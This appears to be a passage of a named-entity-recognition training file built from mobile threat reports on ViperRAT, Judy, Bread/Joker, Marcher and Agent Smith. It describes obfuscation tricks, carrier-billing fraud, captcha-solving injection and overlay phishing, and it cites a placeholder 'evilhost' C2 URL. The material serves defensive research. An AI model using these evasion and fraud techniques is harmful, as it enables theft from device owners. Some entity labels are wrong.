contain the surveillanceware capabilities .", "spans": {}, "info": {"id": "cyner_train_001578", "source": "cyner_train"}} {"text": "Lookout uncovered nine secondary payload applications : * These apps have not been previously reported and were discovered using data from the Lookout global sensor network , which collects app and device information from over 100 million sensors to provide researchers and customers with a holistic look at the mobile threat ecosystem today .", "spans": {"ORGANIZATION: Lookout": [[0, 7], [143, 150]]}, "info": {"id": "cyner_train_001579", "source": "cyner_train"}} {"text": "Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn ’ t present on their device .", "spans": {}, "info": {"id": "cyner_train_001580", "source": "cyner_train"}} {"text": "For example , if a victim has Viber on their device , it will choose to retrieve the Viber Update second stage .", "spans": {"SYSTEM: Viber": [[30, 35]], "SYSTEM: Viber Update": [[85, 97]]}, "info": {"id": "cyner_train_001582", "source": "cyner_train"}} {"text": "What was taken The actors behind ViperRAT seem to be particularly interested in image data .", "spans": {"MALWARE: ViperRAT": [[33, 41]]}, "info": {"id": "cyner_train_001584", "source": "cyner_train"}} {"text": "We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these , 97 percent , were highly likely encrypted images taken using the device camera .", "spans": {}, "info": {"id": "cyner_train_001585", "source": "cyner_train"}} {"text": "We observed legitimate exfiltrated files of the following types of data : Contact information Compressed recorded audio in the Adaptive Multi-Rate ( amr ) file format Images captured from the device camera Images stored on both internal device and SDCard storage that are listed in the MediaStore Device geolocation information SMS content 
Chrome browser search history and bookmarks Call log information Cell tower information Device network metadata ; such as phone number , device software version , network country , network operator , SIM country , SIM operator , SIM serial , IMSI , voice mail number , phone", "spans": {}, "info": {"id": "cyner_train_001588", "source": "cyner_train"}} {"text": "type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported .", "spans": {}, "info": {"id": "cyner_train_001589", "source": "cyner_train"}} {"text": "Standard browser search history Standard browser bookmarks Device handset metadata ; such as brand , display , hardware , manufacturer , product , serial , radio version , and SDK .", "spans": {}, "info": {"id": "cyner_train_001590", "source": "cyner_train"}} {"text": "Below is a collection of API methods and a brief description around their purpose .", "spans": {}, "info": {"id": "cyner_train_001592", "source": "cyner_train"}} {"text": "Israeli media published the first reports about the social networking and social engineering aspects of this campaign .", "spans": {}, "info": {"id": "cyner_train_001594", "source": "cyner_train"}} {"text": "However it ’ s unclear whether organizations that later reported on ViperRAT performed their own independent research or simply based their content on the original Israeli report .", "spans": {"MALWARE: ViperRAT": [[68, 76]]}, "info": {"id": "cyner_train_001595", "source": "cyner_train"}} {"text": "ViperRAT has been operational for quite some time , with what appears to be a test application that surfaced in late 2015 .", "spans": {"MALWARE: ViperRAT": [[0, 8]]}, "info": {"id": "cyner_train_001597", "source": "cyner_train"}} {"text": "Many of the default strings in this application are in Arabic , including the name .", "spans": {}, "info": {"id": "cyner_train_001598", "source": "cyner_train"}} {"text": "This leads us to believe this is another actor .", 
"spans": {}, "info": {"id": "cyner_train_001600", "source": "cyner_train"}} {"text": "However , the existence of threats like ViperRAT and Pegasus , the most sophisticated piece of mobile surveillanceware we ’ ve seen to date , are evidence that attackers are targeting mobile devices .", "spans": {"MALWARE: ViperRAT": [[40, 48]], "MALWARE: Pegasus": [[53, 60]]}, "info": {"id": "cyner_train_001602", "source": "cyner_train"}} {"text": "Enterprise and government employees all use these devices in their day-to-day work , which means IT and security leaders within these organizations must prioritize mobile in their security strategies .", "spans": {}, "info": {"id": "cyner_train_001604", "source": "cyner_train"}} {"text": "Check Point researchers discovered another widespread malware campaign on Google Play , Google ’ s official app store .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "SYSTEM: Google Play": [[74, 85]], "ORGANIZATION: Google": [[88, 94]]}, "info": {"id": "cyner_train_001605", "source": "cyner_train"}} {"text": "The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements , generating revenues for the perpetrators behind it .", "spans": {}, "info": {"id": "cyner_train_001607", "source": "cyner_train"}} {"text": "The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads .", "spans": {}, "info": {"id": "cyner_train_001608", "source": "cyner_train"}} {"text": "Some of the apps we discovered resided on Google Play for several years , but all were recently updated .", "spans": {"SYSTEM: Google Play": [[42, 53]]}, "info": {"id": "cyner_train_001609", "source": "cyner_train"}} {"text": "It is unclear how long the malicious code existed inside the apps , hence the actual spread of the malware remains unknown .", "spans": {}, "info": {"id": "cyner_train_001610", "source": "cyner_train"}} {"text": "We also found several apps containing the malware , which were developed by other 
developers on Google Play .", "spans": {"SYSTEM: Google Play": [[96, 107]]}, "info": {"id": "cyner_train_001611", "source": "cyner_train"}} {"text": "The connection between the two campaigns remains unclear , and it is possible that one borrowed code from the other , knowingly or unknowingly .", "spans": {}, "info": {"id": "cyner_train_001612", "source": "cyner_train"}} {"text": "Similar to previous malware which infiltrated Google Play , such as FalseGuide and Skinner , Judy relies on the communication with its Command and Control server ( C & C ) for its operation .", "spans": {"SYSTEM: Google Play": [[46, 57]], "MALWARE: FalseGuide": [[68, 78]], "MALWARE: Skinner": [[83, 90]]}, "info": {"id": "cyner_train_001615", "source": "cyner_train"}} {"text": "The server replies with the actual malicious payload , which includes JavaScript code , a user-agent string and URLs controlled by the malware author .", "spans": {}, "info": {"id": "cyner_train_001619", "source": "cyner_train"}} {"text": "The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website .", "spans": {}, "info": {"id": "cyner_train_001620", "source": "cyner_train"}} {"text": "Upon clicking the ads , the malware author receives payment from the website developer , which pays for the illegitimate clicks and traffic .", "spans": {}, "info": {"id": "cyner_train_001622", "source": "cyner_train"}} {"text": "The JavaScript code locates the targeted ads by searching for iframes which contain ads from Google ads infrastructure , as shown in the image below : The fraudulent clicks generate a large revenue for the perpetrators , especially since the malware reached a presumably wide spread .", "spans": {"SYSTEM: Google ads": [[93, 103]]}, "info": {"id": "cyner_train_001623", "source": "cyner_train"}} {"text": "Who is behind Judy ?", "spans": {"MALWARE: Judy": [[14, 18]]}, "info": {"id": "cyner_train_001624", "source": "cyner_train"}} 
{"text": "The malicious apps are all developed by a Korean company named Kiniwini , registered on Google Play as ENISTUDIO corp .", "spans": {"ORGANIZATION: Kiniwini": [[63, 71]], "SYSTEM: Google Play": [[88, 99]], "ORGANIZATION: ENISTUDIO corp": [[103, 117]]}, "info": {"id": "cyner_train_001625", "source": "cyner_train"}} {"text": "The company develops mobile apps for both Android and iOS platforms .", "spans": {"SYSTEM: Android": [[42, 49]], "SYSTEM: iOS": [[54, 57]]}, "info": {"id": "cyner_train_001626", "source": "cyner_train"}} {"text": "It is quite unusual to find an actual organization behind mobile malware , as most of them are developed by purely malicious actors .", "spans": {}, "info": {"id": "cyner_train_001627", "source": "cyner_train"}} {"text": "It is important to note that the activity conducted by the malware is not borderline advertising , but definitely an illegitimate use of the users ’ mobile devices for generating fraudulent clicks , benefiting the attackers .", "spans": {}, "info": {"id": "cyner_train_001628", "source": "cyner_train"}} {"text": "Although most apps have positive ratings , some of the users have noticed and reported Judy ’ s suspicious activities , as seen in the images below : As seen in previous malware , such as DressCode , a high reputation does not necessarily indicate that the app is safe for use .", "spans": {"MALWARE: Judy": [[87, 91]], "MALWARE: DressCode": [[188, 197]]}, "info": {"id": "cyner_train_001630", "source": "cyner_train"}} {"text": "Hackers can hide their apps ’ real intentions or even manipulate users into leaving positive ratings , in some cases unknowingly .", "spans": {}, "info": {"id": "cyner_train_001631", "source": "cyner_train"}} {"text": "Users can not rely on the official app stores for their safety , and should implement advanced security protections capable of detecting and blocking zero-day mobile malware .", "spans": {}, "info": {"id": "cyner_train_001632", "source": "cyner_train"}} {"text": 
"We first started tracking Bread ( also known as Joker ) in early 2017 , identifying apps designed solely for SMS fraud .", "spans": {"MALWARE: Bread": [[26, 31]], "MALWARE: Joker": [[48, 53]]}, "info": {"id": "cyner_train_001634", "source": "cyner_train"}} {"text": "As the Play Store has introduced new policies and Google Play Protect has scaled defenses , Bread apps were forced to continually iterate to search for gaps .", "spans": {"SYSTEM: Play Store": [[7, 17]], "SYSTEM: Google Play Protect": [[50, 69]], "MALWARE: Bread": [[92, 97]]}, "info": {"id": "cyner_train_001635", "source": "cyner_train"}} {"text": "Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere .", "spans": {"SYSTEM: Play Store": [[85, 95]]}, "info": {"id": "cyner_train_001637", "source": "cyner_train"}} {"text": "In this post , we show how Google Play Protect has defended against a well organized , persistent attacker and share examples of their techniques .", "spans": {"SYSTEM: Google Play Protect": [[27, 46]]}, "info": {"id": "cyner_train_001638", "source": "cyner_train"}} {"text": "Both of these types of fraud take advantage of mobile billing techniques involving the user ’ s carrier .", "spans": {}, "info": {"id": "cyner_train_001640", "source": "cyner_train"}} {"text": "SMS Billing Carriers may partner with vendors to allow users to pay for services by SMS .", "spans": {}, "info": {"id": "cyner_train_001641", "source": "cyner_train"}} {"text": "A charge is then added to the user ’ s bill with their mobile service provider .", "spans": {}, "info": {"id": "cyner_train_001643", "source": "cyner_train"}} {"text": "Toll Billing Carriers may also provide payment endpoints over a web page .", "spans": {}, "info": {"id": "cyner_train_001644", "source": "cyner_train"}} {"text": "The user visits the URL to complete the payment and enters their phone number .", "spans": {}, "info": {"id": "cyner_train_001645", "source": 
"cyner_train"}} {"text": "Verification that the request is coming from the user ’ s device is completed using two possible methods : The user connects to the site over mobile data , not WiFi ( so the service provider directly handles the connection and can validate the phone number ) ; or The user must retrieve a code sent to them via SMS and enter it into the web page ( thereby proving access to the provided phone number ) .", "spans": {}, "info": {"id": "cyner_train_001646", "source": "cyner_train"}} {"text": "Fraud Both of the billing methods detailed above provide device verification , but not user verification .", "spans": {}, "info": {"id": "cyner_train_001647", "source": "cyner_train"}} {"text": "The carrier can determine that the request originates from the user ’ s device , but does not require any interaction from the user that can not be automated .", "spans": {}, "info": {"id": "cyner_train_001648", "source": "cyner_train"}} {"text": "Here are some highlights .", "spans": {}, "info": {"id": "cyner_train_001651", "source": "cyner_train"}} {"text": "Standard Encryption Frequently , Bread apps take advantage of standard crypto libraries in ` java.util.crypto ` .", "spans": {}, "info": {"id": "cyner_train_001652", "source": "cyner_train"}} {"text": "We have discovered apps using AES , Blowfish , and DES as well as combinations of these to encrypt their strings .", "spans": {}, "info": {"id": "cyner_train_001653", "source": "cyner_train"}} {"text": "Custom Encryption Other variants have used custom-implemented encryption algorithms .", "spans": {}, "info": {"id": "cyner_train_001654", "source": "cyner_train"}} {"text": "Some common techniques include : basic XOR encryption , nested XOR and custom key-derivation methods .", "spans": {}, "info": {"id": "cyner_train_001655", "source": "cyner_train"}} {"text": "Split Strings Encrypted strings can be a signal that the code is trying to hide something .", "spans": {}, "info": {"id": "cyner_train_001657", "source": 
"cyner_train"}} {"text": "Bread has used a few tricks to keep strings in plaintext while preventing basic string matching .", "spans": {"MALWARE: Bread": [[0, 5]]}, "info": {"id": "cyner_train_001658", "source": "cyner_train"}} {"text": "Going one step further , these substrings are sometimes scattered throughout the code , retrieved from static variables and method calls .", "spans": {}, "info": {"id": "cyner_train_001659", "source": "cyner_train"}} {"text": "“ .clic ” and “ k ( ) ; ” ) .", "spans": {}, "info": {"id": "cyner_train_001661", "source": "cyner_train"}} {"text": "Delimiters Another technique to obfuscate unencrypted strings uses repeated delimiters .", "spans": {}, "info": {"id": "cyner_train_001662", "source": "cyner_train"}} {"text": "A short , constant string of characters is inserted at strategic points to break up keywords : At runtime , the delimiter is removed before using the string : API OBFUSCATION SMS and toll fraud generally requires a few basic behaviors ( for example , disabling WiFi or accessing SMS ) , which are accessible by a handful of APIs .", "spans": {}, "info": {"id": "cyner_train_001663", "source": "cyner_train"}} {"text": "Reflection Most methods for hiding API usage tend to use Java reflection in some way .", "spans": {}, "info": {"id": "cyner_train_001665", "source": "cyner_train"}} {"text": "In some samples , Bread has simply directly called the Reflect API on strings decrypted at runtime .", "spans": {"MALWARE: Bread": [[18, 23]]}, "info": {"id": "cyner_train_001666", "source": "cyner_train"}} {"text": "In the native library , it stores the strings to access the SMS API .", "spans": {}, "info": {"id": "cyner_train_001670", "source": "cyner_train"}} {"text": "The nativesend method uses the Java Native Interface ( JNI ) to fetch and call the Android SMS API .", "spans": {"SYSTEM: Android": [[83, 90]]}, "info": {"id": "cyner_train_001671", "source": "cyner_train"}} {"text": "WebView JavaScript Interface Continuing on the theme 
of cross-language bridges , Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews .", "spans": {"MALWARE: Bread": [[81, 86]]}, "info": {"id": "cyner_train_001673", "source": "cyner_train"}} {"text": "However , the app does create a WebView and registers a JavaScript interface to this class .", "spans": {}, "info": {"id": "cyner_train_001676", "source": "cyner_train"}} {"text": "This gives JavaScript run in the WebView access to this method .", "spans": {}, "info": {"id": "cyner_train_001677", "source": "cyner_train"}} {"text": "The app loads a URL pointing to a Bread-controlled server .", "spans": {}, "info": {"id": "cyner_train_001678", "source": "cyner_train"}} {"text": "The response contains some basic HTML and JavaScript .", "spans": {}, "info": {"id": "cyner_train_001679", "source": "cyner_train"}} {"text": "In green , we can see the references to the SMS API .", "spans": {}, "info": {"id": "cyner_train_001680", "source": "cyner_train"}} {"text": "PACKING In addition to implementing custom obfuscation techniques , apps have used several commercially available packers including : Qihoo360 , AliProtect and SecShell .", "spans": {"SYSTEM: Qihoo360": [[134, 142]], "SYSTEM: AliProtect": [[145, 155]], "SYSTEM: SecShell": [[160, 168]]}, "info": {"id": "cyner_train_001683", "source": "cyner_train"}} {"text": "The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption .", "spans": {}, "info": {"id": "cyner_train_001686", "source": "cyner_train"}} {"text": "After we blocked those samples , they moved a significant portion of malicious functionality into the native library , which resulted in a rather peculiar back and forth between Dalvik and native code : COMMAND & CONTROL Dynamic Shortcodes & Content Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details .", 
"spans": {}, "info": {"id": "cyner_train_001687", "source": "cyner_train"}} {"text": "In the example server response below , the green fields show text to be shown to the user .", "spans": {}, "info": {"id": "cyner_train_001688", "source": "cyner_train"}} {"text": "The red fields are used as the shortcode and keyword for SMS billing .", "spans": {}, "info": {"id": "cyner_train_001689", "source": "cyner_train"}} {"text": "At runtime , the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server .", "spans": {}, "info": {"id": "cyner_train_001691", "source": "cyner_train"}} {"text": "The steps implemented include : Load a URL in a WebView Run JavaScript in WebView Toggle WiFi state Toggle mobile data state Read/modify SMS inbox Solve captchas Captchas One of the more interesting states implements the ability to solve basic captchas ( obscured letters and numbers ) .", "spans": {}, "info": {"id": "cyner_train_001693", "source": "cyner_train"}} {"text": "First , the app creates a JavaScript function to call a Java method , getImageBase64 , exposed to WebView using addJavascriptInterface .", "spans": {}, "info": {"id": "cyner_train_001694", "source": "cyner_train"}} {"text": "The value used to replace GET_IMG_OBJECT comes from the JSON configuration .", "spans": {}, "info": {"id": "cyner_train_001695", "source": "cyner_train"}} {"text": "The app then uses JavaScript injection to create a new script in the carrier ’ s web page to run the new function .", "spans": {}, "info": {"id": "cyner_train_001696", "source": "cyner_train"}} {"text": "The base64-encoded image is then uploaded to an image recognition service .", "spans": {}, "info": {"id": "cyner_train_001697", "source": "cyner_train"}} {"text": "If the text is retrieved successfully , the app uses JavaScript injection again to submit the HTML form with the captcha answer .", "spans": {}, "info": {"id": "cyner_train_001698", "source": "cyner_train"}} 
{"text": "The app checks if the device ’ s network matches one of those provided by the server .", "spans": {}, "info": {"id": "cyner_train_001702", "source": "cyner_train"}} {"text": "Server-side Carrier Checks In the JavaScript bridge API obfuscation example covered above , the server supplied the app with the necessary strings to complete the billing process .", "spans": {}, "info": {"id": "cyner_train_001706", "source": "cyner_train"}} {"text": "However , analysts may not always see the indicators of compromise in the server ’ s response .", "spans": {}, "info": {"id": "cyner_train_001707", "source": "cyner_train"}} {"text": "In this example , the requests to the server take the following form : Here , the “ operator ” query parameter is the Mobile Country Code and Mobile Network Code .", "spans": {}, "info": {"id": "cyner_train_001708", "source": "cyner_train"}} {"text": "The server can use this information to determine if the user ’ s carrier is one of Bread ’ s targets .", "spans": {"MALWARE: Bread": [[83, 88]]}, "info": {"id": "cyner_train_001709", "source": "cyner_train"}} {"text": "If not , the response is scrubbed of the strings used to complete the billing fraud .", "spans": {}, "info": {"id": "cyner_train_001710", "source": "cyner_train"}} {"text": "MISLEADING USERS Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure , showing terms and conditions or a confirm button .", "spans": {"MALWARE: Bread": [[17, 22]]}, "info": {"id": "cyner_train_001711", "source": "cyner_train"}} {"text": "Other versions included all the pieces needed for a valid disclosure message .", "spans": {}, "info": {"id": "cyner_train_001713", "source": "cyner_train"}} {"text": "Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps .", "spans": {"MALWARE: Bread": [[0, 5]]}, "info": {"id": "cyner_train_001715", "source": "cyner_train"}} {"text": "VERSIONING Bread has 
also leveraged an abuse tactic unique to app stores : versioning .", "spans": {"MALWARE: Bread": [[11, 16]]}, "info": {"id": "cyner_train_001716", "source": "cyner_train"}} {"text": "Some apps have started with clean versions , in an attempt to grow user bases and build the developer accounts ’ reputations .", "spans": {}, "info": {"id": "cyner_train_001717", "source": "cyner_train"}} {"text": "Some are first uploaded with all the necessary code except the one line that actually initializes the billing process .", "spans": {}, "info": {"id": "cyner_train_001720", "source": "cyner_train"}} {"text": "Others may have the necessary permissions , but are missing the classes containing the fraud code .", "spans": {}, "info": {"id": "cyner_train_001721", "source": "cyner_train"}} {"text": "FAKE REVIEWS When early versions of apps are first published , many five star reviews appear with comments like : “ So .. good .. ” “ very beautiful ” Later , 1 star reviews from real users start appearing with comments like : “ Deception ” “ The app is not honest … ” SUMMARY Sheer volume appears to be the preferred approach for Bread developers .", "spans": {"MALWARE: Bread": [[331, 336]]}, "info": {"id": "cyner_train_001725", "source": "cyner_train"}} {"text": "At different times , we have seen three or more active variants using different approaches or targeting different carriers .", "spans": {}, "info": {"id": "cyner_train_001726", "source": "cyner_train"}} {"text": "Within each variant , the malicious code present in each sample may look nearly identical with only one evasion technique changed .", "spans": {}, "info": {"id": "cyner_train_001727", "source": "cyner_train"}} {"text": "Sample 1 may use AES-encrypted strings with reflection , while Sample 2 ( submitted on the same day ) will use the same code but with plaintext strings .", "spans": {"ORGANIZATION: AES-encrypted": [[17, 30]]}, "info": {"id": "cyner_train_001728", "source": "cyner_train"}} {"text": "This family showcases 
the amount of resources that malware authors now have to expend .", "spans": {}, "info": {"id": "cyner_train_001731", "source": "cyner_train"}} {"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09", "spans": {}, "info": {"id": "cyner_train_001733", "source": "cyner_train"}} {"text": "com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131", "spans": {}, "info": {"id": "cyner_train_001734", "source": "cyner_train"}} {"text": "com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for", "spans": {"MALWARE: Exobot": [[158, 164]], "MALWARE: Marcher": [[167, 174]], "SYSTEM: Android": [[179, 186]]}, "info": {"id": "cyner_train_001735", "source": "cyner_train"}} {"text": "the Android platform have received media attention .", "spans": {"SYSTEM: Android": [[4, 11]]}, "info": {"id": "cyner_train_001736", "source": "cyner_train"}} {"text": "One of these , called Marcher ( aka Exobot ) , seems to be especially active with different samples appearing on a daily basis .", "spans": {"MALWARE: Marcher": [[22, 29]], "MALWARE: Exobot": [[36, 42]]}, "info": {"id": "cyner_train_001737", "source": "cyner_train"}} {"text": "This malware variant also appears to be technically superior to many other banking Trojans being able to use its overlay attack even on Android 6 , which has technical 
improvements compared to the previous Android versions to prevent such attacks .", "spans": {"SYSTEM: Android 6": [[136, 145]], "SYSTEM: Android": [[206, 213]]}, "info": {"id": "cyner_train_001738", "source": "cyner_train"}} {"text": "The main infection vector is a phishing attack using SMS/MMS .", "spans": {}, "info": {"id": "cyner_train_001739", "source": "cyner_train"}} {"text": "On installation , the app requests the user to provide SMS storage access and high Android privileges such as Device Admin .", "spans": {"SYSTEM: Android": [[83, 90]]}, "info": {"id": "cyner_train_001741", "source": "cyner_train"}} {"text": "Other infection vectors include pornographic websites serving apps called Adobe Flash or YouPorn .", "spans": {"SYSTEM: Adobe Flash": [[74, 85]], "SYSTEM: YouPorn": [[89, 96]]}, "info": {"id": "cyner_train_001742", "source": "cyner_train"}} {"text": "The first attack vector is to compromise the out of band authentication for online banks that rely on SMS using SMS forwarding .", "spans": {}, "info": {"id": "cyner_train_001744", "source": "cyner_train"}} {"text": "The second attack vector , the overlay attack , shows a customized phishing window whenever a targeted application is started on the device .", "spans": {}, "info": {"id": "cyner_train_001745", "source": "cyner_train"}} {"text": "The overlay window is often indistinguishable from the expected screen ( such as a login screen for a banking app ) and is used to steal the victim ’ s banking credentials .", "spans": {}, "info": {"id": "cyner_train_001746", "source": "cyner_train"}} {"text": "The target list and bank specific fake login pages can be dynamically updated via their C2 panel ( dashboard back-end ) which significantly increases the adaptability and scalability of this attack .", "spans": {}, "info": {"id": "cyner_train_001747", "source": "cyner_train"}} {"text": "In addition , this type of Android banking malware does not require the device to be rooted or the app to have any specific 
Android permission ( besides android.permission.INTERNET to retrieve the overlay contents and send its captured data ) .", "spans": {"SYSTEM: Android": [[27, 34], [124, 131]]}, "info": {"id": "cyner_train_001748", "source": "cyner_train"}} {"text": "The many changes we see in the way the attacks are performed show that attackers are heavily experimenting to find the best way of infecting a mobile device and abusing existing functionality to perform successful phishing attacks .", "spans": {}, "info": {"id": "cyner_train_001749", "source": "cyner_train"}} {"text": "The next stage in device infection could be the use of exploit kits and malvertising , which would be quite effective due the many Android vulnerabilities and consumers with unpatched devices .", "spans": {"VULNERABILITY: Android vulnerabilities": [[131, 154]], "VULNERABILITY: unpatched devices": [[174, 191]]}, "info": {"id": "cyner_train_001750", "source": "cyner_train"}} {"text": "Technical Analysis Permissions Marcher ’ s APK size is fairly small ( only 683KB for sample eb8f02fc30ec49e4af1560e54b53d1a7 ) , much smaller than most legitimate apps and other popular mobile malware samples .", "spans": {"MALWARE: Marcher": [[31, 38]]}, "info": {"id": "cyner_train_001752", "source": "cyner_train"}} {"text": "This sample only includes Dalvik bytecode and resources without any native libraries .", "spans": {}, "info": {"id": "cyner_train_001753", "source": "cyner_train"}} {"text": "The package name ( vyn.hhsdzgvoexobmkygffzwuewrbikzud ) and its many activities and services have randomized names , probably to make it a bit more difficult to detect the package using blacklisting .", "spans": {}, "info": {"id": "cyner_train_001754", "source": "cyner_train"}} {"text": "The set of permissions required by Marcher according to the manifest is as follows : ∗ android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) ∗ android.permission.SEND_SMS ( send SMS messages ) ∗ 
android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) ∗ android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) ∗ android.permission.INTERNET ( communicate with the internet ) ∗ android.permission.VIBRATE", "spans": {"MALWARE: Marcher": [[35, 42]]}, "info": {"id": "cyner_train_001755", "source": "cyner_train"}} {"text": "( control the vibrator ) ∗ android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) ∗ android.permission.WRITE_SMS ( edit/delete SMS ) ∗ android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) ∗ android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) ∗ android.permission.GET_TASKS ( retrieve running applications ) ∗ android.permission.CALL_PHONE ( call phone numbers )", "spans": {}, "info": {"id": "cyner_train_001756", "source": "cyner_train"}} {"text": "∗ android.permission.WRITE_SETTINGS ( read/write global system settings ) ∗ android.permission.RECEIVE_SMS ( intercept SMS messages ) ∗ android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) ∗ android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) ∗ android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS", "spans": {}, "info": {"id": "cyner_train_001757", "source": "cyner_train"}} {"text": "( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined .", "spans": {}, "info": {"id": "cyner_train_001758", "source": "cyner_train"}} {"text": "Runtastic sample permission prompt Runtastic sample permission prompt Checking foreground app Marcher is one of the few Android banking Trojans to use the AndroidProcesses library , which enables the application to obtain the name of the Android package that is currently running in the foreground .", "spans": {"SYSTEM: Runtastic": [[0, 9], [35, 
44]], "MALWARE: Marcher": [[94, 101]], "SYSTEM: Android": [[238, 245]]}, "info": {"id": "cyner_train_001759", "source": "cyner_train"}} {"text": "This library is used because it uses the only ( publicly known ) way to retrieve this information on Android 6 ( using the process OOM score read from the /proc directory ) .", "spans": {"SYSTEM: Android 6": [[101, 110]]}, "info": {"id": "cyner_train_001760", "source": "cyner_train"}} {"text": "When the current app on the foreground matches with an app targeted by the malware , the Trojan will show the corresponding phishing overlay , making the user think it is the app that was just started .", "spans": {}, "info": {"id": "cyner_train_001761", "source": "cyner_train"}} {"text": "The complete list of apps can be seen below .", "spans": {}, "info": {"id": "cyner_train_001763", "source": "cyner_train"}} {"text": "The phishing pages shown in the overlay use Ajax calls to communicate with a PHP back-end which stores all user input .", "spans": {}, "info": {"id": "cyner_train_001764", "source": "cyner_train"}} {"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ?", "spans": {}, "info": {"id": "cyner_train_001765", "source": "cyner_train"}} {"text": "There is no way to access the original app again even if victims terminate the overlay process and reopen app , until credit card ( name , number , expiry date , security code ) and/or bank information ( PIN , VBV passcode , date of birth , etc .", "spans": {}, "info": {"id": "cyner_train_001767", "source": "cyner_train"}} {"text": "Agent Smith : A New Species of Mobile Malware July 10 , 2019 Check Point Researchers recently discovered a new variant of mobile malware that quietly infected around 25 million devices , while the user remains completely unaware .", "spans": {"MALWARE: Agent Smith": [[0, 11]], "ORGANIZATION: Check Point": [[61, 72]]}, "info": {"id": "cyner_train_001770", "source": "cyner_train"}} {"text": "This activity resembles previous 
campaigns such as Gooligan , HummingBad and CopyCat .", "spans": {"MALWARE: Gooligan": [[51, 59]], "MALWARE: HummingBad": [[62, 72]], "MALWARE: CopyCat": [[77, 84]]}, "info": {"id": "cyner_train_001774", "source": "cyner_train"}} {"text": "In a much-improved Android security environment , the actors behind Agent Smith seem to have moved into the more complex world of constantly searching for new loopholes , such as Janus , Bundle and Man-in-the-Disk , to achieve a 3-stage infection chain , in order to build a botnet of controlled devices to earn profit for the perpetrator .", "spans": {"SYSTEM: Android": [[19, 26]], "MALWARE: Agent Smith": [[68, 79]], "VULNERABILITY: Janus": [[179, 184]], "VULNERABILITY: Bundle": [[187, 193]], "VULNERABILITY: Man-in-the-Disk": [[198, 213]]}, "info": {"id": "cyner_train_001776", "source": "cyner_train"}} {"text": "“ Agent Smith ” is possibly the first campaign seen that ingrates and weaponized all these loopholes and are described in detail below .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001777", "source": "cyner_train"}} {"text": "However , it could easily be used for far more intrusive and harmful purposes such as banking credential theft .", "spans": {}, "info": {"id": "cyner_train_001779", "source": "cyner_train"}} {"text": "Indeed , due to its ability to hide it ’ s icon from the launcher and impersonates any popular existing apps on a device , there are endless possibilities for this sort of malware to harm a user ’ s device .", "spans": {}, "info": {"id": "cyner_train_001780", "source": "cyner_train"}} {"text": "Check Point Research has submitted data to Google and law enforcement units to facilitate further investigation .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[43, 49]]}, "info": {"id": "cyner_train_001781", "source": "cyner_train"}} {"text": "As the research progressed , it started to reveal unique characteristics which made us believe we were 
looking at an all-new malware campaign found in the wild .", "spans": {}, "info": {"id": "cyner_train_001786", "source": "cyner_train"}} {"text": "After a series of technical analysis ( which is covered in detail below ) and heuristic threat hunting , we discovered that a complete “ Agent Smith ” infection has three main phases : A dropper app lures victim to install itself voluntarily .", "spans": {"MALWARE: Agent Smith": [[137, 148]]}, "info": {"id": "cyner_train_001787", "source": "cyner_train"}} {"text": "The initial dropper has a weaponized Feng Shui Bundle as encrypted asset files .", "spans": {}, "info": {"id": "cyner_train_001788", "source": "cyner_train"}} {"text": "Dropper variants are usually barely functioning photo utility , games , or sex related apps .", "spans": {}, "info": {"id": "cyner_train_001789", "source": "cyner_train"}} {"text": "The dropper automatically decrypts and installs its core malware APK which later conducts malicious patching and app updates .", "spans": {}, "info": {"id": "cyner_train_001790", "source": "cyner_train"}} {"text": "The core malware is usually disguised as Google Updater , Google Update for U or “ com.google.vending ” .", "spans": {"ORGANIZATION: Google": [[41, 47], [58, 64]]}, "info": {"id": "cyner_train_001791", "source": "cyner_train"}} {"text": "The core malware ’ s icon is hidden .", "spans": {}, "info": {"id": "cyner_train_001792", "source": "cyner_train"}} {"text": "The core malware extracts the device ’ s installed app list .", "spans": {}, "info": {"id": "cyner_train_001793", "source": "cyner_train"}} {"text": "If it finds apps on its prey list ( hard-coded or sent from C & C server ) , it will extract the base APK of the 